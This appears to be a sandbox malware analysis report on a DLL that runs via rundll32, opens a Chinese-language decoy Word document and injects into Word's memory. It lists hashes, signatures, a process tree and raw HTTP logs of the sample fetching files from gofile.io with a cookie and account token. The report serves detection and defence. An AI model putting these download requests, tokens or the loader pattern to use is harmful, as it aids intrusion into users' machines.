b7d67a09e35031ce5260b4ee614ed83c18dc57c7625178dc6e689e0aa4f65f6d

Analysis

max time kernel
117s
max time network
120s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
21/08/2023, 06:43 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b7d67a09e35031ce5260b4ee614ed83c18dc57c7625178dc6e689e0aa4f65f6d.dll
Size

908KB
MD5

d663ebb9947ea39d2004a7fa6e8d79ca
SHA1

1fbdbe294fdb4aaa56ec93716abb2060195723c4
SHA256

b7d67a09e35031ce5260b4ee614ed83c18dc57c7625178dc6e689e0aa4f65f6d
SHA512

4b25c84958b67e5fe235881b534f5ea6d7017d1b53572ff734f5eeac4fb09bbac77c16960165f9225d95ee64e1e222ec53d665fa7295751d75a7b8c0522b1c16
SSDEEP

24576:GHcgLiNmJ7FWqxxixsJrJ5WRJlqvHbNAx:Cc0igBsIrJ5SqWx

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 9 IoCs

flow	pid	Process
3	1860	rundll32.exe
15	1860	rundll32.exe
18	1860	rundll32.exe
21	1860	rundll32.exe
23	1860	rundll32.exe
24	1860	rundll32.exe
27	1860	rundll32.exe
28	1860	rundll32.exe
29	1860	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2392	1860	WerFault.exe	17

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2996	WINWORD.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2996	WINWORD.EXE
2996	WINWORD.EXE

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 1860 wrote to memory of 2996	1860	rundll32.exe	28
PID 1860 wrote to memory of 2996	1860	rundll32.exe	28
PID 1860 wrote to memory of 2996	1860	rundll32.exe	28
PID 1860 wrote to memory of 2996	1860	rundll32.exe	28
PID 1860 wrote to memory of 2392	1860	rundll32.exe	29
PID 1860 wrote to memory of 2392	1860	rundll32.exe	29
PID 1860 wrote to memory of 2392	1860	rundll32.exe	29

cURL User-Agent 9 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	18	curl/8.0.1-DEV
HTTP User-Agent header	27	curl/8.0.1-DEV
HTTP User-Agent header	29	curl/8.0.1-DEV
HTTP User-Agent header	3	curl/8.0.1-DEV
HTTP User-Agent header	15	curl/8.0.1-DEV
HTTP User-Agent header	24	curl/8.0.1-DEV
HTTP User-Agent header	28	curl/8.0.1-DEV
HTTP User-Agent header	21	curl/8.0.1-DEV
HTTP User-Agent header	23	curl/8.0.1-DEV

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\b7d67a09e35031ce5260b4ee614ed83c18dc57c7625178dc6e689e0aa4f65f6d.dll,#1
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Public\downloads\关于2023年3季度个人通信费报销工作的通知.docx"
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:2996
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1860 -s 532
  2⤵
  - Program crash
  PID:2392

Network

DNS

store2.gofile.io

rundll32.exe

Remote address:

8.8.8.8:53

Request

store2.gofile.io

IN A

Response

store2.gofile.io

IN A

31.14.70.242
GET

https://store2.gofile.io/download/807173d5-f642-4d7b-a31b-31d3174006fc/update8

rundll32.exe

Remote address:

31.14.70.242:443

Request

GET /download/807173d5-f642-4d7b-a31b-31d3174006fc/update8 HTTP/1.1
Host: store2.gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*
Cookie: cookie=93d0d25b-2e1d-4b65-a30b-a2fe469c294f; accountToken=6AUlmfTs1yFJPxrEuyz5yesIp5skt8T8;

Response

HTTP/1.1 302 Found

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Origin: *
Content-Length: 101
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Content-Type: text/plain; charset=utf-8
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 21 Aug 2023 06:43:47 GMT
Location: https://file100.gofile.io/download/807173d5-f642-4d7b-a31b-31d3174006fc/update8
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
DNS

apps.identrust.com

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A

Response

apps.identrust.com

IN CNAME

identrust.edgesuite.net

identrust.edgesuite.net

IN CNAME

a1952.dscq.akamai.net

a1952.dscq.akamai.net

IN A

2.18.121.70

a1952.dscq.akamai.net

IN A

2.18.121.68
GET

http://apps.identrust.com/roots/dstrootcax3.p7c

Remote address:

2.18.121.70:80

Request

GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

Response

HTTP/1.1 200 OK

X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT
ETag: "37d-5f433188daa00"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Mon, 21 Aug 2023 07:43:46 GMT
Date: Mon, 21 Aug 2023 06:43:46 GMT
Connection: keep-alive
DNS

file100.gofile.io

rundll32.exe

Remote address:

8.8.8.8:53

Request

file100.gofile.io

IN A

Response

file100.gofile.io

IN A

57.128.73.214
GET

https://file100.gofile.io/download/807173d5-f642-4d7b-a31b-31d3174006fc/update8

rundll32.exe

Remote address:

57.128.73.214:443

Request

GET /download/807173d5-f642-4d7b-a31b-31d3174006fc/update8 HTTP/1.1
Host: file100.gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*

Response

HTTP/1.1 302 Found

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Origin: *
Content-Length: 78
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Content-Type: text/plain; charset=utf-8
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 21 Aug 2023 06:43:47 GMT
Location: https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
DNS

gofile.io

rundll32.exe

Remote address:

8.8.8.8:53

Request

gofile.io

IN A

Response

gofile.io

IN A

51.38.43.18

gofile.io

IN A

51.178.66.33

gofile.io

IN A

151.80.29.83
GET

https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

rundll32.exe

Remote address:

51.38.43.18:443

Request

GET /d/3afe079f-0006-4686-be70-419de3ed38d7 HTTP/1.1
Host: gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*

Response

HTTP/1.1 200 OK

Content-Length: 500
Content-Type: text/html; charset=utf-8
Date: Mon, 21 Aug 2023 06:43:47 GMT
Etag: W/"1f4-3NmhMe05ppV0LEbD2JzVU36n3fY"
Expect-Ct: max-age=0
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
DNS

store11.gofile.io

rundll32.exe

Remote address:

8.8.8.8:53

Request

store11.gofile.io

IN A

Response

store11.gofile.io

IN A

31.14.70.247
GET

https://store11.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

rundll32.exe

Remote address:

31.14.70.247:443

Request

GET /download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx HTTP/1.1
Host: store11.gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*
Cookie: cookie=93d0d25b-2e1d-4b65-a30b-a2fe469c294f; accountToken=6AUlmfTs1yFJPxrEuyz5yesIp5skt8T8;

Response

HTTP/1.1 302 Found

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Origin: *
Content-Length: 257
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Content-Type: text/plain; charset=utf-8
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 21 Aug 2023 06:43:48 GMT
Location: https://file140.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
DNS

file140.gofile.io

rundll32.exe

Remote address:

8.8.8.8:53

Request

file140.gofile.io

IN A

Response

file140.gofile.io

IN A

141.94.252.160
GET

https://file140.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

rundll32.exe

Remote address:

141.94.252.160:443

Request

GET /download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx HTTP/1.1
Host: file140.gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*

Response

HTTP/1.1 302 Found

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Origin: *
Content-Length: 78
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Content-Type: text/plain; charset=utf-8
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 21 Aug 2023 06:43:48 GMT
Location: https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
GET

https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

rundll32.exe

Remote address:

51.38.43.18:443

Request

GET /d/3afe079f-0006-4686-be70-419de3ed38d7 HTTP/1.1
Host: gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*

Response

HTTP/1.1 200 OK

Content-Length: 500
Content-Type: text/html; charset=utf-8
Date: Mon, 21 Aug 2023 06:43:48 GMT
Etag: W/"1f4-3NmhMe05ppV0LEbD2JzVU36n3fY"
Expect-Ct: max-age=0
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
GET

https://store11.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

rundll32.exe

Remote address:

31.14.70.247:443

Request

GET /download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx HTTP/1.1
Host: store11.gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*
Cookie: cookie=93d0d25b-2e1d-4b65-a30b-a2fe469c294f; accountToken=6AUlmfTs1yFJPxrEuyz5yesIp5skt8T8;

Response

HTTP/1.1 302 Found

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Origin: *
Content-Length: 257
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Content-Type: text/plain; charset=utf-8
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 21 Aug 2023 06:43:52 GMT
Location: https://file140.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
GET

https://file140.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

rundll32.exe

Remote address:

141.94.252.160:443

Request

GET /download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx HTTP/1.1
Host: file140.gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*

Response

HTTP/1.1 302 Found

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Origin: *
Content-Length: 78
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Content-Type: text/plain; charset=utf-8
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Date: Mon, 21 Aug 2023 06:43:52 GMT
Location: https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
GET

https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

rundll32.exe

Remote address:

51.38.43.18:443

Request

GET /d/3afe079f-0006-4686-be70-419de3ed38d7 HTTP/1.1
Host: gofile.io
User-Agent: curl/8.0.1-DEV
Accept: */*

Response

HTTP/1.1 200 OK

Content-Length: 500
Content-Type: text/html; charset=utf-8
Date: Mon, 21 Aug 2023 06:43:52 GMT
Etag: W/"1f4-3NmhMe05ppV0LEbD2JzVU36n3fY"
Expect-Ct: max-age=0
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0

31.14.70.242:443

https://store2.gofile.io/download/807173d5-f642-4d7b-a31b-31d3174006fc/update8

tls, http

rundll32.exe

1.3kB
7.0kB
12
14

HTTP Request

GET https://store2.gofile.io/download/807173d5-f642-4d7b-a31b-31d3174006fc/update8

HTTP Response

302
2.18.121.70:80

http://apps.identrust.com/roots/dstrootcax3.p7c

http

421 B
1.7kB
6
5

HTTP Request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

HTTP Response

200
127.0.0.1:49191

rundll32.exe
127.0.0.1:49198

rundll32.exe
57.128.73.214:443

https://file100.gofile.io/download/807173d5-f642-4d7b-a31b-31d3174006fc/update8

tls, http

rundll32.exe

1.2kB
6.9kB
13
12

HTTP Request

GET https://file100.gofile.io/download/807173d5-f642-4d7b-a31b-31d3174006fc/update8

HTTP Response

302
127.0.0.1:49201

rundll32.exe
51.38.43.18:443

https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

tls, http

rundll32.exe

1.1kB
6.7kB
12
14

HTTP Request

GET https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

HTTP Response

200
127.0.0.1:49206

rundll32.exe
31.14.70.247:443

https://store11.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

tls, http

rundll32.exe

1.5kB
7.3kB
13
14

HTTP Request

GET https://store11.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

HTTP Response

302
141.94.252.160:443

https://file140.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

tls, http

rundll32.exe

1.4kB
6.9kB
13
14

HTTP Request

GET https://file140.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

HTTP Response

302
51.38.43.18:443

https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

tls, http

rundll32.exe

1.1kB
6.7kB
12
14

HTTP Request

GET https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

HTTP Response

200
127.0.0.1:49209

rundll32.exe
127.0.0.1:49212

rundll32.exe
31.14.70.247:443

https://store11.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

tls, http

rundll32.exe

1.5kB
7.3kB
13
14

HTTP Request

GET https://store11.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

HTTP Response

302
141.94.252.160:443

https://file140.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

tls, http

rundll32.exe

1.4kB
6.9kB
13
14

HTTP Request

GET https://file140.gofile.io/download/d2013d41-da57-4f0e-a614-039bfeef4b77/%E5%85%B3%E4%BA%8E2023%E5%B9%B43%E5%AD%A3%E5%BA%A6%E4%B8%AA%E4%BA%BA%E9%80%9A%E4%BF%A1%E8%B4%B9%E6%8A%A5%E9%94%80%E5%B7%A5%E4%BD%9C%E7%9A%84%E9%80%9A%E7%9F%A5.docx

HTTP Response

302
51.38.43.18:443

https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

tls, http

rundll32.exe

1.1kB
6.6kB
11
12

HTTP Request

GET https://gofile.io/d/3afe079f-0006-4686-be70-419de3ed38d7

HTTP Response

200
127.0.0.1:49222

rundll32.exe
127.0.0.1:49225

rundll32.exe
127.0.0.1:49228

rundll32.exe

8.8.8.8:53

store2.gofile.io

dns

rundll32.exe

62 B
78 B
1
1

DNS Request

store2.gofile.io

DNS Response

31.14.70.242
8.8.8.8:53

apps.identrust.com

dns

64 B
165 B
1
1

DNS Request

apps.identrust.com

DNS Response

2.18.121.70

2.18.121.68
8.8.8.8:53

file100.gofile.io

dns

rundll32.exe

63 B
79 B
1
1

DNS Request

file100.gofile.io

DNS Response

57.128.73.214
8.8.8.8:53

gofile.io

dns

rundll32.exe

55 B
103 B
1
1

DNS Request

gofile.io

DNS Response

51.38.43.18

51.178.66.33

151.80.29.83
8.8.8.8:53

store11.gofile.io

dns

rundll32.exe

63 B
79 B
1
1

DNS Request

store11.gofile.io

DNS Response

31.14.70.247
8.8.8.8:53

file140.gofile.io

dns

rundll32.exe

63 B
79 B
1
1

DNS Request

file140.gofile.io

DNS Response

141.94.252.160

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\downloads\关于2023年3季度个人通信费报销工作的通知.docx

Filesize
500B

MD5
604839b85b4f3067dd581dc8227943a6

SHA1
dcd9a131ed39a695742c46c3d89cd5537ea7ddf6

SHA256
fac4ccbd72e7121472d0a5dafdbea65d23ce8ccdb49a3c01c1fa5cf56d02fb31

SHA512
0935c765de15ba48c0cd7555ed3758657848ee6bc5e5011667d7854093cb91ac6ac60a8575288784998aa926bf5614fc83caeed777fb738c5a16138f996a5c7d

Download Submit
memory/2996-57-0x000000002F880000-0x000000002F9DD000-memory.dmp

Filesize
1.4MB

Download
memory/2996-58-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2996-59-0x0000000070E6D000-0x0000000070E78000-memory.dmp

Filesize
44KB

Download
memory/2996-64-0x000000002F880000-0x000000002F9DD000-memory.dmp

Filesize
1.4MB

Download
memory/2996-65-0x0000000070E6D000-0x0000000070E78000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.